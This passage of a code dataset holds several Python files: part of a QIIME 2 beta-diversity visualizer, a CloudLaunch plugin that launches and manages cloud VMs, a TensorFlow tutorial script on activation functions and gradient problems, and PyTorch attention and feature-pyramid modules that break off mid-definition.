urllib.parse.quote_plus(str(group_id))))\n fig.clear()\n\n pairs_summary.to_csv(os.path.join(output_dir, 'raw_data.tsv'), sep='\\t')\n\n result_html = q2templates.df_to_html(result.to_frame())\n\n if pairwise:\n pairwise_results = []\n for group1_id, group2_id in itertools.combinations(groupings, 2):\n pairwise_result = \\\n _get_pairwise_group_significance_stats(\n distance_matrix=distance_matrix,\n group1_id=group1_id,\n group2_id=group2_id,\n 
groupings=groupings,\n metadata=metadata,\n beta_group_significance_fn=beta_group_significance_fn,\n permutations=permutations)\n pairwise_results.append([group1_id,\n group2_id,\n pairwise_result['sample size'],\n permutations,\n pairwise_result['test statistic'],\n pairwise_result['p-value']])\n columns = ['Group 1', 'Group 2', 'Sample size', 'Permutations',\n result['test statistic name'], 'p-value']\n pairwise_results = pd.DataFrame(pairwise_results, columns=columns)\n pairwise_results.set_index(['Group 1', 'Group 2'], inplace=True)\n pairwise_results['q-value'] = multipletests(\n pairwise_results['p-value'], method='fdr_bh')[1]\n pairwise_results.sort_index(inplace=True)\n pairwise_path = os.path.join(\n output_dir, '%s-pairwise.csv' % method)\n pairwise_results.to_csv(pairwise_path)\n\n pairwise_results_html = q2templates.df_to_html(pairwise_results)\n else:\n pairwise_results_html = None\n\n # repartition groupings for rendering\n group_ids = list(groupings.keys())\n row_count, group_count = 3, len(group_ids) # Start at three plots per row\n while group_count % row_count != 0:\n row_count = row_count - 1\n\n group_rows = [group_ids[g:g+row_count] for g in range(0, group_count,\n row_count)]\n\n index = os.path.join(\n TEMPLATES, 'beta_group_significance_assets', 'index.html')\n q2templates.render(index, output_dir, context={\n 'initial_dm_length': initial_dm_length,\n 'filtered_dm_length': filtered_dm_length,\n 'method': method,\n 'group_rows': group_rows,\n 'bootstrap_group_col_size': int(12 / row_count),\n 'result': result_html,\n 'pairwise_results': pairwise_results_html\n })\n\n\ndef mantel(output_dir: str, dm1: skbio.DistanceMatrix,\n dm2: skbio.DistanceMatrix, method: str = 'spearman',\n permutations: int = 999, intersect_ids: bool = False,\n label1: str = 'Distance Matrix 1',\n label2: str = 'Distance Matrix 2') -> None:\n test_statistics = {'spearman': 'rho', 'pearson': 'r'}\n alt_hypothesis = 'two-sided'\n\n # The following code to handle mismatched 
IDs, and subsequently filter the\n # distance matrices, is not technically necessary because skbio's mantel\n # function will raise an error on mismatches with `strict=True`, and will\n # handle intersection if `strict=False`. However, we need to handle the ID\n # matching explicitly to find *which* IDs are mismatched -- the error\n # message coming from scikit-bio doesn't describe those. We also need to\n # have the mismatched IDs to display as a warning in the viz if\n # `intersect_ids=True`. Finally, the distance matrices are explicitly\n # filtered to matching IDs only because their data are used elsewhere in\n # this function (e.g. extracting scatter plot data).\n\n # Find the symmetric difference between ID sets.\n ids1 = set(dm1.ids)\n ids2 = set(dm2.ids)\n mismatched_ids = ids1 ^ ids2\n\n if not intersect_ids and mismatched_ids:\n raise ValueError(\n 'The following ID(s) are not contained in both distance matrices. '\n 'This sometimes occurs when mismatched files are passed. If this '\n 'is not the case, you can use `intersect_ids` to discard these '\n 'mismatches and apply the Mantel test to only those IDs that are '\n 'found in both distance matrices.\\n\\n%s'\n % ', '.join(sorted(mismatched_ids)))\n\n if mismatched_ids:\n matched_ids = ids1 & ids2\n # Run in `strict` mode because the matches should all be found in both\n # matrices.\n dm1 = dm1.filter(matched_ids, strict=True)\n dm2 = dm2.filter(matched_ids, strict=True)\n\n # Run in `strict` mode because all IDs should be matched at this point.\n r, p, sample_size = skbio.stats.distance.mantel(\n dm1, dm2, method=method, permutations=permutations,\n alternative=alt_hypothesis, strict=True)\n\n result = pd.Series([method.title(), sample_size, permutations,\n alt_hypothesis, r, p],\n index=['Method', 'Sample size', 'Permutations',\n 'Alternative hypothesis',\n '%s %s' % (method.title(),\n test_statistics[method]),\n 'p-value'],\n name='Mantel test results')\n table_html = 
q2templates.df_to_html(result.to_frame())\n\n # We know the distance matrices have matching ID sets at this point, so we\n # can safely generate all pairs of IDs using one of the matrices' ID sets\n # (it doesn't matter which one).\n scatter_data = []\n for id1, id2 in itertools.combinations(dm1.ids, 2):\n scatter_data.append((dm1[id1, id2], dm2[id1, id2]))\n\n plt.figure()\n x = 'Pairwise Distance (%s)' % label1\n y = 'Pairwise Distance (%s)' % label2\n scatter_data = pd.DataFrame(scatter_data, columns=[x, y])\n sns.regplot(x=x, y=y, data=scatter_data, fit_reg=False)\n plt.savefig(os.path.join(output_dir, 'mantel-scatter.svg'))\n\n context = {\n 'table': table_html,\n 'sample_size': sample_size,\n 'mismatched_ids': mismatched_ids\n }\n index = os.path.join(\n TEMPLATES, 'mantel_assets', 'index.html')\n q2templates.render(index, output_dir, context=context)\n","sub_path":"q2_diversity/_beta/_visualizer.py","file_name":"_visualizer.py","file_ext":"py","file_size_in_byte":14564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521218982","text":"\"\"\"Base VM plugin implementations.\"\"\"\nimport copy\nimport time\nimport yaml\n\nfrom cloudbridge.cloud.interfaces.resources import TrafficDirection\nimport requests\nimport requests.exceptions\n\nfrom djcloudbridge import domain_model\nfrom .app_plugin import AppPlugin\n\nimport logging\nlog = logging.getLogger(__name__)\n\n\nclass BaseVMAppPlugin(AppPlugin):\n \"\"\"\n Implementation for the basic VM app.\n\n It is expected that other apps inherit this class and override or\n complement methods provided here.\n \"\"\"\n\n def __init__(self):\n \"\"\"Init any base app vars.\"\"\"\n self.base_app = True\n\n @staticmethod\n def process_app_config(provider, name, cloud_config, app_config):\n \"\"\"Extract any extra user data from the app config and return it.\"\"\"\n return app_config.get(\"config_cloudlaunch\", {}).get(\n \"instance_user_data\", {})\n\n 
@staticmethod\n def sanitise_app_config(app_config):\n \"\"\"Return a sanitized copy of the supplied app config object.\"\"\"\n return copy.deepcopy(app_config)\n\n def _get_or_create_kp(self, provider, kp_name):\n \"\"\"Get or create an SSH key pair with the supplied name.\"\"\"\n kps = provider.security.key_pairs.find(name=kp_name)\n if kps:\n return kps[0]\n else:\n log.debug(\"Creating key pair {0}\".format(kp_name))\n return provider.security.key_pairs.create(name=kp_name)\n\n def _get_or_create_vmf(self, provider, subnet_id, vmf_name, description):\n \"\"\"Fetch an existing VM firewall named ``vmf_name`` or create one.\"\"\"\n vmf = provider.security.vm_firewalls.find(name=vmf_name)\n if len(vmf) > 0:\n return vmf[0]\n subnet = provider.networking.subnets.get(subnet_id)\n return provider.security.vm_firewalls.create(\n name=vmf_name, description=description,\n network_id=subnet.network_id)\n\n def _get_cb_launch_config(self, provider, image, cloudlaunch_config):\n \"\"\"Compose a CloudBridge launch config object.\"\"\"\n lc = None\n if cloudlaunch_config.get(\"rootStorageType\", \"instance\") == \"volume\":\n if not lc:\n lc = provider.compute.instances.create_launch_config()\n lc.add_volume_device(source=image,\n size=int(cloudlaunch_config.get(\n \"rootStorageSize\", 20)),\n is_root=True)\n return lc\n\n def wait_for_http(self, url, max_retries=200, poll_interval=5):\n \"\"\"Wait till app is responding at http URL.\"\"\"\n count = 0\n while count < max_retries:\n time.sleep(poll_interval)\n try:\n r = requests.head(url)\n r.raise_for_status()\n return\n except requests.exceptions.HTTPError as e:\n if e.response.status_code in (401, 403):\n return\n except requests.exceptions.ConnectionError:\n pass\n count += 1\n\n def attach_public_ip(self, provider, inst):\n \"\"\"\n If instance has no public IP, try to attach one.\n\n The method will attach a random floating IP that's available in the\n account. 
If there are no available IPs, try to allocate a new one.\n\n :rtype: ``str``\n :return: The attached IP address. This can be one that's already\n available on the instance or one that has been attached.\n \"\"\"\n if not inst.public_ips:\n fip = None\n for ip in provider.networking.floating_ips:\n if not ip.in_use:\n fip = ip\n break\n if fip:\n log.debug(\"Attaching an existing floating IP %s\" %\n fip.public_ip)\n inst.add_floating_ip(fip)\n else:\n fip = provider.networking.floating_ips.create()\n log.debug(\"Attaching a just-created floating IP %s\" %\n fip.public_ip)\n inst.add_floating_ip(fip)\n return fip.public_ip\n elif len(inst.public_ips) > 0:\n return inst.public_ips[0]\n else:\n return None\n\n def configure_vm_firewalls(self, provider, subnet_id, firewall):\n \"\"\"\n Ensure any supplied firewall rules are represented in a VM Firewall.\n\n The following format is expected:\n\n ```\n \"firewall\": [\n {\n \"rules\": [\n {\n \"from\": \"22\",\n \"to\": \"22\",\n \"cidr\": \"0.0.0.0/0\",\n \"protocol\": \"tcp\"\n },\n {\n \"src_group\": \"MyApp\",\n \"from\": \"1\",\n \"to\": \"65535\",\n \"protocol\": \"tcp\"\n },\n {\n \"src_group\": 'bd9756b8-e9ab-41b1-8a1b-e466a04a997c',\n \"from\": \"22\",\n \"to\": \"22\",\n \"protocol\": \"tcp\"\n }\n ],\n \"securityGroup\": \"MyApp\",\n \"description\": \"My App SG\"\n }\n ]\n ```\n\n Note that if ``src_group`` is supplied, it must be either the current\n security group name or an ID of a different security group for which\n a rule should be added (i.e., different security groups cannot be\n identified by name and their ID must be used).\n\n :rtype: List of CloudBridge SecurityGroup\n :return: Security groups satisfying the constraints.\n \"\"\"\n vmfl = []\n for group in firewall:\n # Get a handle on the SG\n vmf_name = group.get('securityGroup') or 'CloudLaunchDefault'\n vmf_desc = group.get('description') or 'Created by CloudLaunch'\n vmf = self._get_or_create_vmf(\n provider, subnet_id, vmf_name, vmf_desc)\n 
vmfl.append(vmf)\n # Apply firewall rules\n for rule in group.get('rules', []):\n try:\n if rule.get('src_group'):\n vmf.rules.create(TrafficDirection.INBOUND,\n rule.get('protocol'),\n int(rule.get('from_port')),\n int(rule.get('to_port')),\n src_dest_fw=vmf)\n else:\n vmf.rules.create(TrafficDirection.INBOUND,\n protocol=rule.get('protocol'),\n from_port=int(rule.get('from')),\n to_port=int(rule.get('to')),\n cidr=rule.get('cidr'))\n except Exception as e:\n log.error(\"Exception applying firewall rules: %s\" % e)\n return vmfl\n\n def get_or_create_subnet(self, provider, net_id=None, placement=None):\n \"\"\"\n Figure out a subnet matching the supplied constraints.\n\n Any combination of the optional parameters is accepted.\n \"\"\"\n if net_id:\n net = provider.networking.networks.get(net_id)\n for sn in net.subnets():\n # No placement necessary; pick a (random) subnet\n if not placement:\n return sn\n # Placement match is necessary\n elif sn.zone == placement:\n return sn\n sn = provider.networking.subnets.get_or_create_default(placement)\n return sn.id if sn else None\n\n def resolve_launch_properties(self, provider, cloudlaunch_config):\n \"\"\"\n Resolve inter-dependent launch properties.\n\n Subnet, Placement, and VM Firewalls have launch dependencies among\n themselves so deduce what does are.\n \"\"\"\n net_id = cloudlaunch_config.get('network', None)\n subnet_id = cloudlaunch_config.get('subnet', None)\n placement = cloudlaunch_config.get('placementZone', None)\n if not subnet_id:\n subnet_id = self.get_or_create_subnet(provider, net_id, placement)\n vmf = None\n if cloudlaunch_config.get('firewall', []):\n vmf = self.configure_vm_firewalls(\n provider, subnet_id, cloudlaunch_config.get('firewall', []))\n return subnet_id, placement, vmf\n\n def launch_app(self, provider, task, name, cloud_config,\n app_config, user_data):\n \"\"\"Initiate the app launch process.\"\"\"\n cloudlaunch_config = app_config.get(\"config_cloudlaunch\", {})\n custom_image_id = 
cloudlaunch_config.get(\"customImageID\", None)\n img = provider.compute.images.get(\n custom_image_id or cloud_config.get('image_id'))\n task.update_state(state='PROGRESSING',\n meta={'action': \"Retrieving or creating a key pair\"})\n kp = self._get_or_create_kp(provider,\n cloudlaunch_config.get('keyPair') or\n 'cloudlaunch_key_pair')\n task.update_state(state='PROGRESSING',\n meta={'action': \"Applying firewall settings\"})\n subnet_id, placement_zone, vmfl = self.resolve_launch_properties(\n provider, cloudlaunch_config)\n cb_launch_config = self._get_cb_launch_config(provider, img,\n cloudlaunch_config)\n vm_type = cloudlaunch_config.get(\n 'instanceType', cloud_config.get('default_instance_type'))\n\n log.debug(\"Launching with subnet %s and VM firewalls %s\" %\n (subnet_id, vmfl))\n log.info(\"Launching base_vm with UD:\\n%s\" % user_data)\n task.update_state(state='PROGRESSING',\n meta={'action': \"Launching an instance of type %s \"\n \"with keypair %s in zone %s\" %\n (vm_type, kp.name, placement_zone)})\n inst = provider.compute.instances.create(\n name=name, image=img, vm_type=vm_type, subnet=subnet_id,\n key_pair=kp, vm_firewalls=vmfl, zone=placement_zone,\n user_data=user_data, launch_config=cb_launch_config)\n task.update_state(state='PROGRESSING',\n meta={'action': \"Waiting for instance %s\" % inst.id})\n log.debug(\"Waiting for instance {0} to be ready...\".format(inst.id))\n inst.wait_till_ready()\n static_ip = cloudlaunch_config.get('staticIP')\n if static_ip:\n task.update_state(state='PROGRESSING',\n meta={'action': \"Assigning requested floating \"\n \"IP: %s\" % static_ip})\n inst.add_floating_ip(static_ip)\n inst.refresh()\n results = {}\n results['keyPair'] = {'id': kp.id, 'name': kp.name,\n 'material': kp.material}\n # FIXME: this does not account for multiple VM fw and expects one\n results['securityGroup'] = {'id': vmfl[0].id, 'name': vmfl[0].name}\n results['instance'] = {'id': inst.id}\n results['publicIP'] = 
self.attach_public_ip(provider, inst)\n task.update_state(\n state='PROGRESSING',\n meta={\"action\": \"Instance created successfully. \" +\n \"Public IP: %s\" % results['publicIP'] if results['publicIP']\n else \"\"})\n if self.base_app:\n if results['publicIP']:\n results['applicationURL'] = 'http://%s/' % results['publicIP']\n task.update_state(\n state='PROGRESSING',\n meta={'action': \"Waiting for application to become ready \"\n \"at %s\" % results['applicationURL']})\n self.wait_for_http(results['applicationURL'])\n else:\n results['applicationURL'] = 'N/A'\n return {\"cloudLaunch\": results}\n\n def _get_deployment_iid(self, deployment):\n \"\"\"\n Extract instance ID for the supplied deployment.\n\n We extract instance ID only for deployments in the SUCCESS state.\n\n @type deployment: ``dict``\n @param deployment: A dictionary describing an instance of the\n app deployment, requiring at least the following\n keys: ``launch_status``, ``launch_result``.\n\n :rtype: ``str``\n :return: Provider-specific instance ID for the deployment or\n ``None`` if instance ID not available.\n \"\"\"\n if deployment.get('launch_status') == 'SUCCESS':\n return deployment.get('launch_result', {}).get(\n 'cloudLaunch', {}).get('instance', {}).get('id')\n else:\n return None\n\n def health_check(self, provider, deployment):\n \"\"\"Check the health of this app.\"\"\"\n log.debug(\"Health check for deployment %s\", deployment)\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return {\"instance_status\": \"unknown\"}\n log.debug(\"Checking the status of instance %s\", iid)\n inst = provider.compute.instances.get(iid)\n if inst:\n return {\"instance_status\": inst.state}\n else:\n return {\"instance_status\": \"deleted\"}\n\n def restart(self, provider, deployment):\n \"\"\"Restart the app associated with the supplied deployment.\"\"\"\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return False\n log.debug(\"Restarting deployment instance %s\", iid)\n 
inst = provider.compute.instances.get(iid)\n if inst:\n inst.reboot()\n return True\n # Instance does not exist so default to False\n return False\n\n def delete(self, provider, deployment):\n \"\"\"\n Delete resource(s) associated with the supplied deployment.\n\n *Note* that this method will delete resource(s) associated with\n the deployment - this is an un-recoverable action.\n \"\"\"\n iid = self._get_deployment_iid(deployment)\n if not iid:\n return False\n log.debug(\"Deleting deployment instance %s\", iid)\n inst = provider.compute.instances.get(iid)\n if inst:\n inst.delete()\n return True\n # Instance does not exist so default to True\n return True\n","sub_path":"django-cloudlaunch/baselaunch/backend_plugins/base_vm_app.py","file_name":"base_vm_app.py","file_ext":"py","file_size_in_byte":14593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607040207","text":"\"\"\"\nExplore multiple ways to address exploding gradients\nand vanishing gradients during training\n\"\"\"\n\n# Common Imports\nfrom datetime import datetime\nimport numpy as np\nimport os\n\n# Data Science Imports\nimport tensorflow as tf\n\n# Graph Imports\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n# Config\nPROJECT_ROOT_DIR = \".\"\nnow = datetime.utcnow().strftime(\"%Y%m%d%H%M%S\")\nroot_logdir = \"tf_logs\"\nlogdir = \"{}/run-{}/\".format(root_logdir, now)\n\n# Declare Functions\n\n\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n\ndef save_fig(fig_id, tight_layout=True):\n if not os.path.exists('images'):\n os.makedirs('images')\n path = os.path.join(PROJECT_ROOT_DIR, \"images\", fig_id + \".png\")\n print(\"Saving\", fig_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format=r'png', dpi=300)\n\n\ndef shuffle_batch(X, y, batch_size):\n rnd_idx = 
np.random.permutation(len(X))\n n_batches = len(X) // batch_size\n for batch_idx in np.array_split(rnd_idx, n_batches):\n X_batch, y_batch = X[batch_idx], y[batch_idx]\n yield X_batch, y_batch\n\n\ndef logit(z):\n \"\"\" Sigmoid Function \"\"\"\n return 1 / (1 + np.exp(-z))\n\n\ndef leaky_relu(z, alpha=0.01):\n return np.maximum(alpha * z, z)\n\n\ndef leaky_relu_tf(z, name=None):\n return tf.maximum(0.01 * z, z, name=name)\n\n\ndef elu(z, alpha=1):\n \"\"\"Exponential linear unit activation function\"\"\"\n return np.where(z < 0, alpha * (np.exp(z) - 1), z)\n\n\ndef selu(z,\n scale=1.0507009873554804934193349852946,\n alpha=1.6732632423543772848170429916717):\n \"\"\"scaled exponential linear unit function\"\"\"\n return scale * elu(z, alpha)\n\n\ndef selu_tf(z,\n scale=1.0507009873554804934193349852946,\n alpha=1.6732632423543772848170429916717):\n return scale * tf.where(z >= 0.0, z, alpha * tf.nn.elu(z))\n\n\n# Create Datasets\n(X_train, y_train), (X_test, y_test) = tf.keras.datasets.mnist.load_data()\nX_train = X_train.astype(np.float32).reshape(-1, 28 * 28) / 255.0\nX_test = X_test.astype(np.float32).reshape(-1, 28 * 28) / 255.0\ny_train = y_train.astype(np.int32)\ny_test = y_test.astype(np.int32)\nX_valid, X_train = X_train[:5000], X_train[5000:]\ny_valid, y_train = y_train[:5000], y_train[5000:]\n\n# Plots\n\nz = np.linspace(-5, 5, 200)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [1, 1], 'k--')\nplt.plot([0, 0], [-0.2, 1.2], 'k-')\nplt.plot(z, logit(z), \"b-\", linewidth=2)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate(\n \"Saturating\",\n xytext=(3.5, 0.7),\n xy=(5, 1),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.annotate(\n \"Saturating\",\n xytext=(-3.5, 0.3),\n xy=(-5, 0),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.annotate(\n \"Linear\",\n xytext=(2, 0.2),\n xy=(0, 0.5),\n arrowprops=props,\n fontsize=14,\n ha=\"center\")\nplt.grid(True)\nplt.title(\"Sigmoid activation function\", 
fontsize=14)\nplt.axis([-5, 5, -0.2, 1.2])\n\nsave_fig(\"sigmoid_saturation_plot\")\nplt.show()\n\n# Xavier and He Initialization\nn_inputs = 28 * 28\nn_hidden1 = 300\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\n\nhe_init = tf.variance_scaling_initializer()\nhidden1 = tf.layers.dense(\n X,\n n_hidden1,\n activation=tf.nn.relu,\n kernel_initializer=he_init,\n name=\"hidden1\")\n\n# Nonsaturating Activating Functions\n# Leaky ReLU\n\nreset_graph()\n\nplt.plot(z, leaky_relu(z, 0.05), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-0.5, 4.2], 'k-')\nplt.grid(True)\nprops = dict(facecolor='black', shrink=0.1)\nplt.annotate(\n 'Leak', xytext=(-3.5, 0.5), xy=(-5, -0.2), arrowprops=props, fontsize=14)\nplt.title(\"Leaky ReLU activation function\", fontsize=14)\nplt.axis([-5, 5, -0.5, 4.2])\n\nsave_fig(\"leaky_relu_plot\")\nplt.show()\n\n# Leaky ReLU in tensorflow\nreset_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\nhidden1 = tf.layers.dense(\n X, n_hidden1, activation=leaky_relu_tf, name=\"hidden1\")\n\nreset_graph()\n\n# NN Hyperparameters\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\n# Training hyperparameters\nlearning_rate = 0.01\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\ny = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\nwith tf.name_scope(\"dnn\"):\n hidden1 = tf.layers.dense(\n X, n_hidden1, activation=leaky_relu_tf, name=\"hidden1\")\n hidden2 = tf.layers.dense(\n hidden1, n_hidden2, activation=leaky_relu_tf, name=\"hidden2\")\n logits = tf.layers.dense(hidden2, n_outputs, name=\"outputs\")\n\nwith tf.name_scope(\"loss\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name=\"loss\")\n\nwith tf.name_scope(\"train\"):\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\nwith 
tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n acc_summary = tf.summary.scalar('accuracy', accuracy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\nfile_writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\n\n# Iteration parameters\nn_epochs = 40\nbatch_size = 50\n\n# For easily collecting and resing model operations\nfor op in (X, y, accuracy, training_op):\n tf.add_to_collection(\"my_important_ops\", op)\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for X_batch, y_batch in shuffle_batch(X_train, y_train, batch_size):\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n if epoch % 5 == 0:\n summary_str = acc_summary.eval(feed_dict={X: X_batch, y: y_batch})\n step = epoch * len(X_batch)\n file_writer.add_summary(summary_str, step)\n acc_batch = accuracy.eval(feed_dict={X: X_batch, y: y_batch})\n acc_valid = accuracy.eval(feed_dict={X: X_valid, y: y_valid})\n print(epoch, \"Batch accuracy:\", acc_batch, \"Validation accuracy:\",\n acc_valid)\n\n save_path = saver.save(sess, \"./tf_mnist_model_final.ckpt\")\n\n# Exponential Linear Unit\nplt.plot(z, elu(z), 'b-', linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([-5, 5], [-1, -1], 'k--')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"ELU activation function ($\\alpha=1$)\", fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"elu_plot\")\nplt.show()\n\n# Implementing ELU in TensorFlow by specifying the activation function\nreset_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\nhidden1 = tf.layers.dense(X, n_hidden1, activation=tf.nn.elu, name=\"hidden1\")\n\n# SELU & SNN, Scaled Exponential Linear Units, Self Normalizing Networks\nplt.plot(z, selu(z), \"b-\", linewidth=2)\nplt.plot([-5, 5], [0, 0], 'k-')\nplt.plot([0, 0], [-2.2, 3.2], 'k-')\nplt.grid(True)\nplt.title(r\"SELU activation function\", 
fontsize=14)\nplt.axis([-5, 5, -2.2, 3.2])\n\nsave_fig(\"selu_plot\")\nplt.show()\n\n# Neural Net for MNIST using the SELU activation function\nreset_graph()\n\n# Network Hyperparameters\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\n# Training Hyperparameters\nlearning_rate = 0.01\n\n# Optimizer hyperparameters\nn_epoch = 40\nbatch_size = 50\n\n# Graph nodes, tensors for X and y\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name=\"X\")\ny = tf.placeholder(tf.int32, shape=(None), name=\"y\")\n\n# Node for the dnn tensor\nwith tf.name_scope(\"dnn\"):\n hidden1 = tf.layers.dense(X, n_hidden1, activation=selu_tf, name=\"hidden1\")\n hidden2 = tf.layers.dense(\n hidden1, n_hidden2, activation=selu_tf, name=\"hidden2\")\n logits = tf.layers.dense(hidden2, n_outputs, name=\"outputs\")\n\nwith tf.name_scope(\"loss\"):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name=\"loss\")\n\nwith tf.name_scope(\"train\"):\n optimizer = tf.train.GradientDescentOptimizer(learning_rate)\n training_op = optimizer.minimize(loss)\n\nwith tf.name_scope(\"eval\"):\n correct = tf.nn.in_top_k(logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n\n# Graph initalizer and saving\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\n# Scale inputs\nmeans = X_train.mean(axis=0, keepdims=True)\nstds = X_train.std(axis=0, keepdims=True) + 1e-10\nX_val_scaled = (X_valid - means) / stds\n\n# For easily collecting and resing model operations\nfor op in (X, y, accuracy, training_op):\n tf.add_to_collection(\"my_important_ops\", op)\n\nwith tf.Session() as sess:\n init.run()\n for epoch in range(n_epochs):\n for X_batch, y_batch in shuffle_batch(X_train, y_train, batch_size):\n X_batch_scaled = (X_batch - means) / stds\n sess.run(training_op, feed_dict={X: X_batch_scaled, y: y_batch})\n if epoch % 5 == 0:\n acc_batch = accuracy.eval(feed_dict={\n X: 
X_batch_scaled,\n y: y_batch\n })\n acc_valid = accuracy.eval(feed_dict={X: X_val_scaled, y: y_valid})\n print(epoch, \"Batch accuracy\", acc_batch, \"Validation accuracy\",\n acc_valid)\n\n save_path = saver.save(sess, \"./tf_model_final_selu.ckpt\")\n","sub_path":"tensorflow_deeplearning/training_deep_neural_networks/norm_reg_optimization/vanishing_exploding_gradients.py","file_name":"vanishing_exploding_gradients.py","file_ext":"py","file_size_in_byte":9320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"200284132","text":"import torch.nn as nn\nimport torch.tensor as Tensor\nimport torch\nimport torch.nn.functional as F\nfrom fastai.vision.all import *\n\n\nclass CBAM(nn.Module):\n def __init__(self, n_channels_in, reduction_ratio, kernel_size):\n super(CBAM, self).__init__()\n self.n_channels_in = n_channels_in\n self.reduction_ratio = reduction_ratio\n self.kernel_size = kernel_size\n\n self.channel_attention = ChannelAttention(n_channels_in, reduction_ratio)\n self.spatial_attention = SpatialAttention(kernel_size)\n\n def forward(self, f):\n chan_att = self.channel_attention(f)\n # print(chan_att.size())\n fp = chan_att * f\n # print(fp.size())\n spat_att = self.spatial_attention(fp)\n # print(spat_att.size())\n fpp = spat_att * fp\n # print(fpp.size())\n return fpp\n\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size):\n super(SpatialAttention, self).__init__()\n self.kernel_size = kernel_size\n\n assert kernel_size % 2 == 1, \"Odd kernel size required\"\n self.conv = nn.Conv2d(in_channels = 2, out_channels = 1, kernel_size = kernel_size, padding= int((kernel_size-1)/2))\n # batchnorm\n\n def forward(self, x):\n max_pool = self.agg_channel(x, \"max\")\n avg_pool = self.agg_channel(x, \"avg\")\n pool = torch.cat([max_pool, avg_pool], dim = 1)\n conv = self.conv(pool)\n # batchnorm\n conv = conv.repeat(1,x.size()[1],1,1)\n att = torch.sigmoid(conv)\n return att\n\n def 
agg_channel(self, x, pool = \"max\"):\n b,c,h,w = x.size()\n x = x.view(b, c, h*w)\n x = x.permute(0,2,1)\n if pool == \"max\":\n x = F.max_pool1d(x,c)\n elif pool == \"avg\":\n x = F.avg_pool1d(x,c)\n x = x.permute(0,2,1)\n x = x.view(b,1,h,w)\n return x\n\nclass ChannelAttention(nn.Module):\n def __init__(self, n_channels_in, reduction_ratio):\n super(ChannelAttention, self).__init__()\n self.n_channels_in = n_channels_in\n self.reduction_ratio = reduction_ratio\n self.middle_layer_size = int(self.n_channels_in/ float(self.reduction_ratio))\n\n self.bottleneck = nn.Sequential(\n nn.Linear(self.n_channels_in, self.middle_layer_size),\n nn.ReLU(),\n nn.Linear(self.middle_layer_size, self.n_channels_in)\n )\n\n\n def forward(self, x):\n kernel = (x.size()[2], x.size()[3])\n avg_pool = F.avg_pool2d(x, kernel )\n max_pool = F.max_pool2d(x, kernel)\n\n\n avg_pool = avg_pool.view(avg_pool.size()[0], -1)\n max_pool = max_pool.view(max_pool.size()[0], -1)\n\n avg_pool_bck = self.bottleneck(avg_pool)\n max_pool_bck = self.bottleneck(max_pool)\n\n pool_sum = avg_pool_bck + max_pool_bck\n\n sig_pool = torch.sigmoid(pool_sum)\n sig_pool = sig_pool.unsqueeze(2).unsqueeze(3)\n\n out = sig_pool.repeat(1,1,kernel[0], kernel[1])\n return out\n\nclass FPN(nn.Module):\n def __init__(self, input_channels:list, output_channels:list):\n super().__init__()\n self.convs = nn.ModuleList(\n [nn.Sequential(nn.Conv2d(in_ch, out_ch*2, kernel_size=3, padding=1),\n nn.ReLU(inplace=True), nn.BatchNorm2d(out_ch*2),\n nn.Conv2d(out_ch*2, out_ch, kernel_size=3, padding=1))\n for in_ch, out_ch in zip(input_channels, output_channels)])\n\n def forward(self, xs:list, last_layer):\n hcs = [F.interpolate(c(x),scale_factor=2**(len(self.convs)-i),mode='bilinear', align_corners=False)\n for i,(c,x) in enumerate(zip(self.convs, xs))]\n hcs.append(last_layer)\n return torch.cat(hcs, dim=1)\n\nclass UnetBlock(nn.Module):\n def __init__(self, up_in_c:int, x_in_c:int, nf:int=None, blur:bool=False,\n 
